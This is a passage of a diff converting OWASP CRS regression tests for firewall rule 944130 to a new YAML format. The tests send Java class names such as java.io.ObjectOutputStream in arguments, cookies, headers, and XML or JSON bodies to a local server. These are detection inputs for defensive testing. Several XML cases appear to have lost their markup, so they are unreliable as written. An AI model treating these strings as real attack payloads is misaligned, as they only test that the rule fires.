"POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 160 desc: "XML attribute value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-161 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 161 desc: "XML element value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-162 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 162 desc: "Nested XML element value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-163 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 163 desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-164 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 164 desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStreamReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-165 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStreamReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 165 desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.InputStreamReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-166 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.InputStreamReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 166 desc: "Argument test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-167 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 167 desc: "Argument name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-168 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader=test" + output: + log: + expect_ids: [944130] + - test_id: 168 desc: "Cookie test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.LineNumberReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-169 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.LineNumberReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 169 desc: "Cookie name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.LineNumberReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-170 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.LineNumberReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 170 desc: "Request header test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.LineNumberReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-171 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.LineNumberReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 171 desc: "XML attribute value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-172 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 172 desc: "XML element value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-173 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 173 desc: "Nested XML element value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-174 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 174 desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-175 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 175 desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.LineNumberReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-176 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.LineNumberReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 176 desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.LineNumberReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-177 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.LineNumberReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 177 desc: "Argument test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-178 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 178 desc: "Argument name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-179 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 179 desc: "Cookie test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ObjectOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-180 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ObjectOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 180 desc: "Cookie name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ObjectOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-181 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ObjectOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 181 desc: "Request header test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ObjectOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-182 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ObjectOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 182 desc: "XML attribute value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-183 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 183 desc: "XML element value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-184 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 184 desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-185 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 185 desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-186 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 186 desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ObjectOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-187 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ObjectOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 187 desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ObjectOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-188 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 